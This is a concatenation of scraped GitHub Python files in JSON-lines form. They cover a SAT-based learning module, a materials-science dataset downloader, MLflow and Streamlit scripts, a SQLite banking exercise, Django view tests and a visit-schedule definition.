          # the best solution\n                if s.replace(' ', '') == '':\n                    res = ' '.join([s[1] for s in sorted(collected)])\n                    return res\n\n\nresult = get(my_string, my_patterns)\nprint(result.count(' '), result)\n","repo_name":"TimurNurlygayanov/test-tasks-example","sub_path":"number_of_spaces_substr.py","file_name":"number_of_spaces_substr.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72517445674","text":"import logging\n\nfrom monolearn.SparseSet import SparseSet\n\nfrom .utils import truncstr, TimeStat\nfrom .LearnModule import LearnModule\n\n\nclass GainanovSAT(LearnModule):\n    log = logging.getLogger(f\"{__name__}\")\n\n    def __init__(\n        self,\n        sense: str = None,  # min/max/None\n        solver: str = \"pysat/cadical\",\n        save_rate: int = 100,\n        limit: int = None,\n        start_level=None,\n    ):\n        assert sense in (\"min\", \"max\", None)\n        self.do_min = sense == \"min\"\n        self.do_max = sense == \"max\"\n        self.do_opt = sense in (\"min\", \"max\")\n        self.solver = solver\n        self.save_rate = int(save_rate)\n        self.limit = None if limit is None else int(limit)\n        self.start_level = start_level\n\n    def _learn(self):\n        self.sat_init(init_sum=self.do_opt)\n\n        self.level = None\n        if self.do_opt:\n            # check if not exhausted\n            if self.sat.solve() is False:\n                self.log.info(\"already exhausted, exiting\")\n                # if was not marked, we won't be here\n                # so mark\n                self.system.set_complete()\n                self.system.set_complete()\n                return True\n\n            if self.start_level is not None:\n                self.level = self.start_level\n            elif self.do_min:\n                self.level = 0\n            elif self.do_max:\n                self.level = self.N\n            else:\n                assert 0\n            assert 0 <= self.level <= self.N\n\n            self.log.info(f\"starting at level {self.level}\")\n\n        self.itr = 0\n        while self.limit is None or self.itr < self.limit:\n            if self.itr and self.itr % self.save_rate 
== 0:\n self.system.save()\n self.itr += 1\n\n unk = self.find_new_unknown()\n if unk is False:\n self.log.info(\"system is completed, saving\")\n self.system.set_complete()\n return True\n\n self.learn_unknown(unk)\n self.system.save()\n return False\n\n @TimeStat.log\n def find_new_unknown(self):\n while True:\n # <= level\n self.log.debug(\n f\"itr #{self.itr}: optimizing (level={self.level})... \"\n f\"stat: (upper: {self.n_upper}, lower: {self.n_lower})\"\n )\n\n assum = ()\n if self.do_min:\n # <= self.level\n assum = [-self.xsum[i] for i in range(self.level + 1, len(self.xsum))]\n elif self.do_max:\n # >= self.level\n assum = [self.xsum[i] for i in range(self.level + 1)]\n\n sol = self.sat.solve(assumptions=assum)\n # self.log.debug(f\"SAT solve: {bool(sol)}\")\n if sol:\n vec = SparseSet(\n i for i, x in enumerate(self.xs) if sol.get(x, 0) == 1\n )\n self.log.debug(\n f\"unknown #{self.itr}, wt {len(vec)}: {truncstr(vec)}\"\n )\n if self.level is not None:\n assert len(vec) == self.level, \\\n \"start level set incorrectly?\"\n return vec\n\n # no sol at current level\n if self.do_opt:\n if self.do_min:\n self.level += 1\n if self.level > self.N:\n self.log.info(\"no new unknowns\")\n return False\n self.log.info(f\"increasing level to {self.level}\")\n\n elif self.do_max:\n self.level -= 1\n if self.level < 0:\n self.log.info(\"no new unknowns\")\n return False\n self.log.info(f\"decreasing level to {self.level}\")\n\n # on each level change check if not done already\n if self.sat.solve() is False:\n self.log.info(f\"exhausted from level {self.level}\")\n return False\n else:\n return False\n assert 0\n\n @TimeStat.log\n def learn_unknown(self, vec):\n is_lower, meta = self.query(vec)\n\n if is_lower:\n self.n_lower += 1\n if self.do_max:\n self.log.debug(f\"fast lower: wt {len(vec)} meta {meta}\")\n self.system.add_lower(vec, meta)\n self.model_exclude_sub(vec)\n else:\n self.learn_up(vec, meta)\n else:\n self.n_upper += 1\n if self.do_min:\n self.log.debug(f\"fast upper: wt {len(vec)} meta {meta}\")\n self.system.add_upper(vec, meta)\n self.model_exclude_super(vec)\n else:\n self.learn_down(vec, meta)\n","repo_name":"hellman/monolearn","sub_path":"monolearn/GainanovSAT.py","file_name":"GainanovSAT.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12461835695","text":"import streamlit as st\n\nfrom model.data_management import load_dataset\n\n\ndef upload_dataset():\n st.markdown(\"## Upload Dataset\")\n\n df = None\n dataset_file = st.file_uploader(\"Choose a dataset \", type=\"csv\", accept_multiple_files=False)\n\n if dataset_file is not None:\n df = load_dataset(dataset_file)\n\n return df","repo_name":"Yakagi17/simple_auto_eda","sub_path":"interface/data_management_interface.py","file_name":"data_management_interface.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6247048086","text":"\"\"\"\nDownloads files from Figshare.\n\nMain page: https://figshare.com/authors/Kamal_Choudhary/4445539\n\"\"\"\n\nimport zipfile\nimport tempfile\nimport os\nimport numpy as np\nimport io\nimport requests\nfrom jarvis.db.jsonutils import loadjson\nfrom jarvis.io.vasp.outputs import Vasprun\nfrom jarvis.io.vasp.inputs import Poscar\nfrom jarvis.io.wannier.outputs import WannierHam\n# from jarvis.analysis.structure.spacegroup import Spacegroup3D\n\n\ndef datasets(dataset=\"\"):\n 
\"\"\"Get collection of dataset names and URLs.\"\"\"\n if dataset == \"dft_2d\":\n url = \"https://ndownloader.figshare.com/files/22471019\"\n js_tag = \"jdft_2d-4-26-2020.json\"\n print(\"Obtaining 2D dataset ...\")\n elif dataset == \"dft_3d\":\n url = \"https://ndownloader.figshare.com/files/22471022\"\n js_tag = \"jdft_3d-4-26-2020.json\"\n print(\"Obtaining 3D dataset ...\")\n elif dataset == \"cfid_3d\":\n url = \"https://ndownloader.figshare.com/files/22470818\"\n js_tag = \"jml_3d-4-26-2020.json\"\n print(\"Obtaining JARVIS-3D CFID dataset 37k...\")\n elif dataset == \"mp_3d\":\n url = \"https://ndownloader.figshare.com/files/24979850\"\n js_tag = \"CFID_mp_desc_data_84k.json\"\n print(\"Obtaining Materials Project-3D CFID dataset 84k...\")\n elif dataset == \"oqmd_3d\":\n url = \"https://ndownloader.figshare.com/files/24981170\"\n js_tag = \"CFID_OQMD_460k.json\"\n print(\"Obtaining OQMD-3D CFID dataset 460k...\")\n elif dataset == \"qm9\":\n url = \"https://ndownloader.figshare.com/files/25159592\"\n js_tag = \"qm9_data_cfid.json\"\n print(\"Obtaining QM9-molecule CFID dataset 134k...\")\n elif dataset == \"aflow1\":\n url = \"https://ndownloader.figshare.com/files/25453256\"\n js_tag = \"CFID_AFLOW1.json\"\n print(\"Obtaining AFLOW-1 CFID dataset 400k...\")\n elif dataset == \"aflow2\":\n url = \"https://ndownloader.figshare.com/files/25453265\"\n js_tag = \"CFID_AFLOW2.json\"\n print(\"Obtaining AFLOW-2 CFID dataset 400k...\")\n elif dataset == \"raw_files\":\n url = \"https://ndownloader.figshare.com/files/25295732\"\n js_tag = \"figshare_data-10-28-2020.json\"\n print(\"Obtaining raw io files...\")\n else:\n ValueError(\"Dataset doesnt exist\", dataset)\n return url, js_tag\n\n\ndef data(dataset=\"dft_2d\"):\n \"\"\"Provide main function to download datasets.\"\"\"\n url, js_tag = datasets(dataset)\n\n # r = requests.get(url)\n # z = zipfile.ZipFile(io.BytesIO(r.content))\n # wdat = z.read(js_tag).decode(\"utf-8\")\n # fd, path = tempfile.mkstemp()\n # with os.fdopen(fd, \"w\") as tmp:\n # tmp.write(wdat)\n # data = loadjson(path)\n\n path = str(os.path.join(os.path.dirname(__file__), js_tag))\n if not os.path.isfile(path):\n zfile = str(os.path.join(os.path.dirname(__file__), \"tmp.zip\"))\n r = requests.get(url)\n f = open(zfile, \"wb\")\n f.write(r.content)\n f.close()\n\n with zipfile.ZipFile(zfile, \"r\") as zipObj:\n # zipObj.extract(path)\n zipObj.extractall(os.path.join(os.path.dirname(__file__)))\n os.remove(zfile)\n data = loadjson(path)\n return data\n\n\ndef get_jid_data(jid=\"JVASP-667\", dataset=\"dft_2d\"):\n \"\"\"Get info for a jid and dataset.\"\"\"\n d = data(dataset)\n for i in d:\n if i[\"jid\"] == jid:\n return i\n\n\ndef get_ff_eneleast():\n \"\"\"Get JARVIS-FF related data.\"\"\"\n jff1 = str(os.path.join(os.path.dirname(__file__), \"jff1.json\"))\n if not os.path.isfile(jff1):\n r = requests.get(\"https://ndownloader.figshare.com/files/10307139\")\n f = open(jff1, \"wb\")\n f.write(r.content)\n f.close()\n data_ff1 = loadjson(jff1)\n return data_ff1\n\n\n# Raw I/O files on figshare repository\nfls = data(\"raw_files\")\n\n\ndef get_wann_electron(jid=\"JVASP-816\"):\n \"\"\"Download electron WTBH if available.\"\"\"\n w = \"\"\n ef = \"\"\n for i in fls[\"WANN\"]:\n if i[\"name\"].split(\".zip\")[0] == jid:\n r = requests.get(i[\"download_url\"])\n z = zipfile.ZipFile(io.BytesIO(r.content))\n wdat = z.read(\"wannier90_hr.dat\").decode(\"utf-8\")\n js_file = jid + \".json\"\n js = z.read(js_file).decode(\"utf-8\")\n fd, path = tempfile.mkstemp()\n with 
os.fdopen(fd, \"w\") as tmp:\n tmp.write(wdat)\n w = WannierHam(path)\n fd, path = tempfile.mkstemp()\n with os.fdopen(fd, \"w\") as tmp:\n tmp.write(js)\n d = loadjson(path)\n ef = d[\"info_mesh\"][\"efermi\"]\n fd, path = tempfile.mkstemp()\n pos = z.read(\"POSCAR\").decode(\"utf-8\")\n with os.fdopen(fd, \"w\") as tmp:\n tmp.write(pos)\n atoms = Poscar.from_file(path).atoms\n return w, ef, atoms\n\n\ndef get_wann_phonon(jid=\"JVASP-1002\", factor=15.633302):\n \"\"\"Download phonon WTBH if available.\"\"\"\n from jarvis.io.phonopy.outputs import get_phonon_tb\n for i in fls[\"FD-ELAST\"]:\n if isinstance(i, dict):\n if i[\"name\"].split(\".zip\")[0] == jid:\n r = requests.get(i[\"download_url\"])\n z = zipfile.ZipFile(io.BytesIO(r.content))\n vrun_path = z.read(\"vasprun.xml\").decode(\"utf-8\")\n fd, path = tempfile.mkstemp()\n with os.fdopen(fd, \"w\") as tmp:\n tmp.write(vrun_path)\n vrun = Vasprun(path)\n fc = vrun.phonon_data()[\"force_constants\"]\n atoms = vrun.all_structures[0]\n # print(atoms)\n # atoms = Atoms.from_poscar(pos)\n # print(atoms)\n fd, path = tempfile.mkstemp()\n get_phonon_tb(fc=fc, atoms=atoms, out_file=path, factor=factor)\n # cvn = Spacegroup3D(atoms).conventional_standard_structure\n w = WannierHam(path)\n return w, atoms\n\n\ndef get_hk_tb(k=np.array([0, 0, 0]), w=[]):\n \"\"\"Get Wannier TB Hamiltonian.\"\"\"\n nr = w.R.shape[0]\n hk = np.zeros((w.nwan, w.nwan), dtype=complex)\n kmat = np.tile(k, (nr, 1))\n exp_ikr = np.exp(1.0j * 2 * np.pi * np.sum(kmat * w.R, 1))\n temp = np.zeros(w.nwan ** 2, dtype=complex)\n for i in range(nr):\n temp += exp_ikr[i] * w.HR[i, :]\n hk = np.reshape(temp, (w.nwan, w.nwan))\n hk = (hk + hk.T.conj()) / 2.0\n return hk\n\n\n\"\"\"\nif __name__ == \"__main__\":\n\n data_2d = data(dataset='dft_2d')\n print('2d',len(data_2d))\n data_3d = data(dataset='dft_3d')\n print('3d',len(data_3d))\n data_ml = data(dataset='cfid_3d')\n print('cfid3d',len(data_ml))\n data_ff = get_ff_eneleast()\n print ('ff',len(data_ff))\n\"\"\"\n","repo_name":"mumerchem/jarvis","sub_path":"jarvis/db/figshare.py","file_name":"figshare.py","file_ext":"py","file_size_in_byte":6655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"11358185371","text":"import tkinter as tk\nfrom tkinter import filedialog\nimport sys\nimport time\nsys.path.append(__file__.replace(\"\\\\\", \"/\").replace(\"mainWindow.py\", \"\"))\nRESOURCESDIR=__file__.replace(\"\\\\\",'/').replace(\"/src/views/mainWindow.PY\",\"\")+\"/ressouces\"\n\nclass MasterView(tk.Frame):\n\n def __init__(self, parent) -> None:\n super().__init__(parent)\n self.parent = parent\n \n self.create_menu()\n\n def postInit(self) -> None:\n self.parent.bind(\"\", self.parent.controller.rightClick)\n\n def create_menu(self):\n self.menubar= tk.Menu(self.parent) \n\n self.menuFile = tk.Menu(self.parent, tearoff=0)\n self.menuFile.add_command(label=\"Open File\",command=None)\n self.menuFile.add_command(label=\"Open Video\",command=None)\n self.menuFile.add_command(label=\"Save\",accelerator=\"CTRL+N\",command=self.saveFile)\n self.menuFile.add_separator()\n self.menuFile.add_command(label=\"Quit\",command=None)\n self.menubar.add_cascade(label=\"File\",menu=self.menuFile)\n \n\n self.menuView=tk.Menu(self.parent,tearoff=0)\n self.menuView.add_command(label=\"Show Graph\",command=None)\n self.menubar.add_cascade(label=\"View\",menu=self.menuView)\n \n self.menuPoint=tk.Menu(self.parent,tearoff=0)\n self.menuPoint.add_command(label=\"Def Scale\",command=None)\n 
self.menuPoint.add_command(label=\"Place Repere\",command=None) \n self.menubar.add_cascade(label=\"Pointage\",menu=self.menuPoint)\n\n self.menuEdit=tk.Menu(self.parent,tearoff=0)\n self.menuEdit.add_command(label=\"Print Value\",command=None)\n self.menubar.add_cascade(label=\"Edit\",menu=self.menuEdit)\n\n self.parent.config(menu=self.menubar) \n def saveFile(self):\n with tk.filedialog.asksaveasfile(parent=self.parent,mode='wb',confirmoverwrite=True,defaultextension=\".csv\",initialdir=RESOURCESDIR,initialfile=f\"data_{time.time()*10:.0f}.csv\") as file:\n pass\n #on ouvre en ecriture bytes pour eviter les putain de test unitaire qui ne marches pas sur linux\n #self.parent.controller.exportDataToCsv(fileIO=file) \n \n \n\n ","repo_name":"vuvu700/projet_technologique","sub_path":"videoTracker/src/views/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2985874915","text":"import mlflow\nfrom pathlib import Path\nfrom datetime import datetime, timezone\n\n\nmlflow.set_tracking_uri(\"http://127.0.0.1:5001\")\n\nmlflow.set_experiment(\"multi_step_poc_w_separate_files\")\n\nmlflow.autolog()\n\nwith mlflow.start_run() as mlflow_run:\n run_name = f\"main_run\"\n mlflow.set_tag(\"mlflow.runName\", run_name)\n with mlflow.start_run(nested=True) as step_01:\n run_name = f\"step_01\"\n mlflow.set_tag(\"mlflow.runName\", run_name)\n\n mlflow.log_param(\"step\", 1)\n\n filepath = Path(__file__).parent / \"steps\" / \"download_raw_data.py\"\n assert filepath.exists()\n mlflow.log_param(\"step_name\", filepath.name)\n mlflow.log_artifact(filepath)\n exec(open(filepath).read())\n\n with mlflow.start_run(nested=True) as step_02:\n run_name = f\"step_02\"\n mlflow.set_tag(\"mlflow.runName\", run_name)\n\n mlflow.log_param(\"step\", 2)\n\n filepath = Path(__file__).parent / \"steps\" / \"validate_input.py\"\n assert filepath.exists()\n mlflow.log_param(\"step_name\", filepath.name)\n mlflow.log_artifact(filepath)\n exec(open(filepath).read())\n\n with mlflow.start_run(nested=True) as step_03:\n run_name = f\"step_03\"\n mlflow.set_tag(\"mlflow.runName\", run_name)\n\n mlflow.log_param(\"step\", 3)\n\n filepath = Path(__file__).parent / \"steps\" / \"train_model.py\"\n assert filepath.exists()\n mlflow.log_param(\"step_name\", filepath.name)\n mlflow.log_artifact(filepath)\n exec(open(filepath).read())\n\n\n with mlflow.start_run(nested=True) as step_04:\n run_name = f\"step_04\"\n mlflow.set_tag(\"mlflow.runName\", run_name)\n\n mlflow.log_param(\"step\", 4)\n mlflow.log_param(\"step_name\", \"Post-processing\")\n","repo_name":"perhedbrant/mlflow-poc","sub_path":"example_projects/multistep_workflow/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19667732464","text":"import random\nimport sqlite3\n\n# The reason why the test #4 doesnt pass is because i store the bin and account number separated, not as a whole, and the thest check the number as a whole.\n# Connect to database and create a cursor instance.\n\nconn = sqlite3.connect(\"../card.s3db\")\ncursor = conn.cursor()\n\nADD_CARD = \"INSERT INTO card (id, number, pin, balance) VALUES (?, ?, ?, ?)\"\n\nDELETE_CARD = \"DELETE FROM card WHERE number == ?\"\n\nGET_ALL_CARDS = \"SELECT * FROM card\"\n\nGET_CARD_NUMBER_ofACCOUNT = \"SELECT number FROM card WHERE number == ? 
\"\n\nGET_PIN_NUMBER_ofACCOUNT = \"SELECT pin FROM card WHERE number == ? \"\n\nGET_BALANCE_ofACCOUNT = \"SELECT balance FROM card WHERE number == ?\"\n\nUPDATE_BALANCE_ofAccount = \"UPDATE card SET balance=(balance - ?) WHERE number == ? \"\n\n\ndef create_card_table():\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS card (\n id INTEGER,\n number TEXT,\n pin TEXT,\n balance INTEGER DEFAULT 0\n )\"\"\")\n conn.commit()\n\n\ndef drop_card_table():\n cursor.execute(\"\"\"DROP TABLE card\"\"\")\n conn.commit()\n\n\ndrop_card_table()\ncreate_card_table()\n\n\ndef remove_symbols_from_string(stringToEdit) -> str:\n \"\"\"\n Convert the fetch into a string, then removes symbols [ ] ( ) , from the string.\n \"\"\"\n string = str(stringToEdit)\n for z in (\"[\", \"\"), (\"]\", \"\"), (\"(\", \"\"), (\")\", \"\"), (\",\", \"\"):\n string = string.replace(*z)\n return string\n\n\ndef gen_acc_number() -> str:\n acc_num = \"\"\n while len(acc_num) < 9:\n acc_num += str(random.randint(0, 9))\n return acc_num\n\n\ndef gen_pin_code() -> str:\n pin_code = \"\"\n while len(pin_code) < 4:\n pin_code += str(random.randint(0, 9))\n return pin_code\n\n\ndef gen_check_digit(bank_idNumber, account_number) -> str:\n \"\"\"\n Luhn's algorithm: all numbers % 10 == 0\n so sum of all numbers of the card number - without check digit - (sum)\n (sum + x) % 10 == 0\n Returns the check-digit that pass Luhn's algorithm\n \"\"\"\n count_list = list(bank_idNumber) + list(account_number)\n int_count_list = [int(k) for k in count_list]\n new_list = []\n check_digit = \"\"\n for a in range(0, len(int_count_list), 2):\n new_list.append(int_count_list[a] * 2)\n for b in range(1, len(int_count_list), 2):\n new_list.append(int_count_list[b])\n c = 0\n for k in new_list:\n if k > 9:\n c += 9\n int_sum = sum(new_list) - c\n\n for x in range(10):\n if (int_sum + x) % 10 == 0:\n check_digit = str(x)\n return check_digit\n\n\nclass CardNumber:\n def __init__(self, _bin, _acc_number, _pin_code):\n self.bin = _bin\n self.acc_number = _acc_number\n self.pin_code = _pin_code\n self.card_number_no_check_digit = self.bin + self.acc_number\n self.balance = 0\n\n\niin_bin = \"400000\"\nchoice = -1\nwhile choice != 0:\n log_in = False\n choice = input(\"1. Create an account\\n\"\n \"2. Log into account\\n\"\n \"3. View all accounts\\n\"\n \"0. 
Exit\\n\")\n if choice == \"1\":\n acc_number = gen_acc_number()\n check_sum = gen_check_digit(iin_bin, acc_number)\n card_number = iin_bin + acc_number + check_sum\n card_pin = gen_pin_code()\n print(\"\\nYour card has been created\\n\"\n \"Your card number:\\n\" +\n card_number + \"\\nYour card PIN:\\n\" +\n card_pin + \"\\n\")\n card = (iin_bin, acc_number + check_sum, card_pin, 0)\n cursor.execute(ADD_CARD, card)\n conn.commit()\n print(\"New card added to the card\\'s database.\")\n print(\"BIN: \" + card[0] + \" Acc_#: \" + card[1] + \"\\n\"\n \"PIN: \" + card[2] + \" Balance: \" + str(card[3]) + \" $\" + \"\\n\")\n elif choice == \"2\":\n # Log into acc\n user = input(\"Enter you card number:\\n\")\n pin = input(\"Enter your PIN:\\n\")\n user_number = user[6:]\n cursor.execute(GET_CARD_NUMBER_ofACCOUNT, (user_number,))\n user_fetch = cursor.fetchall()\n user_data = remove_symbols_from_string(user_fetch)\n cursor.execute(GET_PIN_NUMBER_ofACCOUNT, (user_number,))\n pin_fetch = cursor.fetchall()\n pin_data = remove_symbols_from_string(pin_fetch)\n card_number = user\n # user[6:]: slice the BIN (400000) from the input, to compare only acc_number, not card number.\n if user_number in user_data:\n if pin in pin_data:\n print(\"\\nYou have successfully logged in!\")\n log_in = True\n while log_in:\n menu = input(\"\\n1. Balance\\n\"\n \"2. Add income\\n\"\n \"3. Do transfer\\n\"\n \"4. Close account\\n\"\n \"5. Log out\\n\"\n \"0. Exit\\n\")\n if menu == \"1\":\n # Print balance\n acc = (user_number,)\n cursor.execute(GET_BALANCE_ofACCOUNT, acc)\n fetch = cursor.fetchall()\n balance = remove_symbols_from_string(fetch)\n print(\"\\nBalance: \" + balance) # + \" $\")\n elif menu == \"2\":\n # Add income\n income = int(input(\"Enter income:\\n\"))\n data = (income, user_number)\n cursor.execute(UPDATE_BALANCE_ofAccount, data)\n conn.commit()\n print(\"\\nIncome was added!\")\n elif menu == \"3\":\n # Transfer money to another card.\n cursor.execute(GET_BALANCE_ofACCOUNT, (user_number,))\n fetch = cursor.fetchall()\n current_balance = int(remove_symbols_from_string(fetch))\n print(\"\\nTransfer\")\n card_num_to_transfer = input(\"Enter card number:\\n\")\n if card_num_to_transfer[6:] == user_number:\n print(\"\\nYou can't transfer money to the same account!\\n\")\n break\n if card_num_to_transfer[-1] == gen_check_digit(card_num_to_transfer[:5],\n card_num_to_transfer[6:]):\n # Means it pass Luhn's algorithm.\n cursor.execute(GET_CARD_NUMBER_ofACCOUNT, (card_num_to_transfer[6:],))\n nums = cursor.fetchall()\n if (card_num_to_transfer[6:],) in nums:\n amount = int(input(\"Enter how much money you want to transfer:\\n\"))\n if amount <= current_balance:\n # do transfer and print success.\n sender = (amount, user_number)\n receiver = (amount, card_num_to_transfer[6:])\n cursor.execute(UPDATE_BALANCE_ofAccount, sender)\n cursor.execute(UPDATE_BALANCE_ofAccount, receiver)\n conn.commit()\n print(\"Success!\")\n else:\n print(\"Not enough money!\")\n else:\n print(\"Such a card does not exist.\")\n else:\n print(\"\\nProbably you made mistake in the card number. 
Please try again!\\n\")\n break\n elif menu == \"4\":\n # Close account\n cursor.execute(DELETE_CARD, (user_number,))\n conn.commit()\n print(\"\\nThe account has been closed!\\n\")\n break\n elif menu == \"5\":\n # Log out\n print(\"\\nYou have successfully logged out!\\n\")\n log_in = False\n elif menu == \"0\":\n print(\"\\nBye!\")\n conn.close()\n exit()\n else:\n print(\"Incorrect parameter.\")\n else:\n print(\"\\nWrong card number or PIN!\\n\")\n else:\n print(\"\\nWrong card number or PIN!\\n\")\n elif choice == \"3\":\n # View all accounts\n cursor.execute(GET_ALL_CARDS)\n data = cursor.fetchall()\n for i in data:\n print(i)\n print()\n elif choice == \"0\":\n # Exit\n print(\"Bye!\")\n conn.close()\n exit()\n else:\n print(\"Incorrect parameter.\")\n","repo_name":"jonestremblay/Simple-Banking-System","sub_path":"banking/banking.py","file_name":"banking.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30174654665","text":"from django import forms\nfrom django.test import Client, TestCase\nfrom django.urls import reverse\n\nfrom ..models import Group, Post, User\n\nNUMBER_OF_POSTS = 13\nNUMBER_OF_POSTS_ON_FIRST_PAGE = 10\nNUMBER_OF_POSTS_ON_SECOND_PAGE = 3\n\n\nclass TaskPagesTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.user = User.objects.create_user(username='StasBasov')\n cls.authorized_client = Client()\n cls.authorized_client.force_login(cls.user)\n\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание',\n )\n\n cls.post = Post.objects.create(\n text='Тестовый пост',\n author=cls.user,\n group=cls.group,\n )\n cls.new_group = Group.objects.create(\n title='Новая граппа',\n slug='new_slug',\n description='Новое описание',\n )\n\n def test_pages_uses_correct_template(self):\n \"\"\"URL-адрес использует соответствующий шаблон.\"\"\"\n\n templates_pages_names = {\n reverse('posts:index'): 'posts/index.html',\n reverse('posts:group_posts',\n kwargs={'slug': 'test-slug'}): 'posts/group_list.html',\n reverse('posts:profile',\n kwargs={'username': 'StasBasov'}): 'posts/profile.html',\n reverse('posts:post_detail',\n kwargs={'post_id':\n self.post.id}): 'posts/post_detail.html',\n reverse('posts:post_create'): 'posts/create_post.html',\n reverse('posts:post_edit',\n kwargs={'post_id':\n self.post.id}): 'posts/create_post.html'}\n\n for reverse_name, template in templates_pages_names.items():\n with self.subTest(reverse_name=reverse_name):\n response = self.authorized_client.get(reverse_name)\n self.assertTemplateUsed(response, template)\n\n def test_index_show_correct_context(self):\n \"\"\"Шаблон index сформирован с правильным контекстом.\"\"\"\n\n response = self.authorized_client.get(reverse('posts:index'))\n page_obj = response.context['page_obj'][0]\n\n self.assertEqual(page_obj, self.post)\n\n def test_group_list_show_correct_context(self):\n \"\"\"Шаблон group_list сформирован с правильным контекстом.\"\"\"\n\n response = self.authorized_client.get(\n reverse('posts:group_posts', kwargs={'slug': 'test-slug'}))\n group = response.context['group']\n page_obj = response.context['page_obj'][0]\n\n self.assertEqual(page_obj, self.post)\n self.assertEqual(group, self.group)\n\n def test_profile_show_correct_context(self):\n \"\"\"Шаблон profile сформирован с правильным контекстом.\"\"\"\n\n response = self.authorized_client.get(\n reverse('posts:profile', kwargs={'username': 
'StasBasov'}))\n        author = response.context['author']\n        page_obj = response.context['page_obj'][0]\n\n        self.assertEqual(page_obj, self.post)\n        self.assertEqual(author, self.post.author)\n\n    def test_post_detail_show_correct_context(self):\n        \"\"\"The post_detail template is rendered with the correct context.\"\"\"\n\n        response = self.authorized_client.get(\n            reverse('posts:post_detail', kwargs={'post_id': self.post.id}))\n        post = response.context['post']\n\n        self.assertEqual(post, self.post)\n\n    def test_post_create_show_correct_context(self):\n        \"\"\"The post_create template is rendered with the correct context.\"\"\"\n\n        response = self.authorized_client.get(reverse('posts:post_create'))\n        form_fields = {\n            'text': forms.fields.CharField,\n            'group': forms.fields.ChoiceField, }\n        for value, expected in form_fields.items():\n            with self.subTest(value=value):\n                form_field = response.context.get('form').fields.get(value)\n                self.assertIsInstance(form_field, expected)\n\n        self.assertIn('is_edit', response.context)\n        self.assertFalse(response.context['is_edit'])\n\n    def test_post_edit_show_correct_context(self):\n        \"\"\"The post_edit template is rendered with the correct context.\"\"\"\n\n        response = self.authorized_client.get(\n            reverse('posts:post_edit', kwargs={'post_id': self.post.id}))\n        form_fields = {\n            'text': forms.fields.CharField,\n            'group': forms.fields.ChoiceField, }\n        for value, expected in form_fields.items():\n            with self.subTest(value=value):\n                form_field = response.context.get('form').fields.get(value)\n                self.assertIsInstance(form_field, expected)\n\n        self.assertIn('is_edit', response.context)\n        self.assertTrue(response.context['is_edit'])\n\n    def test_new_post(self):\n        \"\"\"A new post appears on three pages.\"\"\"\n\n        pages = (\n            reverse('posts:index'),\n            reverse('posts:profile', kwargs={'username': self.user.username}),\n            reverse('posts:group_posts', kwargs={'slug': self.group.slug}),)\n\n        for page in pages:\n            response = self.authorized_client.get(page)\n            page_obj = response.context['page_obj']\n\n            self.assertIn(self.post, page_obj)\n\n    def test_new_post_not_on_other_group_page(self):\n        \"\"\"A new post does not appear on another group's page.\"\"\"\n\n        response = self.authorized_client.get(\n            reverse('posts:group_posts', kwargs={'slug': self.new_group.slug}))\n\n        page_obj = response.context['page_obj']\n\n        self.assertNotIn(self.post, page_obj)\n\n\nclass PaginatorViewsTest(TestCase):\n    \"\"\"The paginator works on all pages.\"\"\"\n\n    @classmethod\n    def setUpClass(cls):\n        super().setUpClass()\n\n        cls.user = User.objects.create_user(username='StasBasov')\n        cls.authorized_client = Client()\n        cls.authorized_client.force_login(cls.user)\n\n        cls.group = Group.objects.create(\n            title='Тестовая группа',\n            slug='test-slug',\n            description='Тестовое описание',\n        )\n        cls.post = Post.objects.create(\n            text='Тестовый пост',\n            author=cls.user,\n            group=cls.group,\n        )\n\n        posts = []\n        for _ in range(1, NUMBER_OF_POSTS):\n            posts.append(Post(\n                text='Один из множества постов',\n                author=cls.user,\n                group=cls.group,\n            ))\n\n        Post.objects.bulk_create(posts)\n\n    def test_paginator_on_three_pages(self):\n        group_page = '/group/test-slug/'\n        profile_page = '/profile/StasBasov/'\n        main_page = '/'\n        second_page = '?page=2'\n\n        page_expected_posts = {\n            group_page: NUMBER_OF_POSTS_ON_FIRST_PAGE,\n            profile_page: NUMBER_OF_POSTS_ON_FIRST_PAGE,\n            main_page: NUMBER_OF_POSTS_ON_FIRST_PAGE,\n            group_page + second_page: NUMBER_OF_POSTS_ON_SECOND_PAGE,\n            profile_page + second_page: NUMBER_OF_POSTS_ON_SECOND_PAGE,\n            main_page + 
second_page: NUMBER_OF_POSTS_ON_SECOND_PAGE,\n }\n\n for address, expected_number_of_posts in page_expected_posts.items():\n with self.subTest(address=address):\n response = self.authorized_client.get(address)\n total_posts_on_page = len(response.context['page_obj'])\n\n self.assertEqual(\n total_posts_on_page,\n expected_number_of_posts\n )\n","repo_name":"Alarm19/hw04_tests","sub_path":"yatube/posts/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15086016954","text":"from edc_visit_schedule import Visit as BaseVisit\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom ....crfs import caregiver_crfs_prn, requisitions_prn, bc_crf_2000, crf_2001, b_crf_3000\nfrom ....crfs import caregiver_crfs_unscheduled, caregiver_ref_crf_prn\n\n\nclass Visit(BaseVisit):\n\n def __init__(self, crfs_unscheduled=None, requisitions_unscheduled=None,\n crfs_prn=None, requisitions_prn=None,\n allow_unscheduled=None, **kwargs):\n super().__init__(\n allow_unscheduled=True if allow_unscheduled is None else allow_unscheduled,\n crfs_unscheduled=crfs_unscheduled or 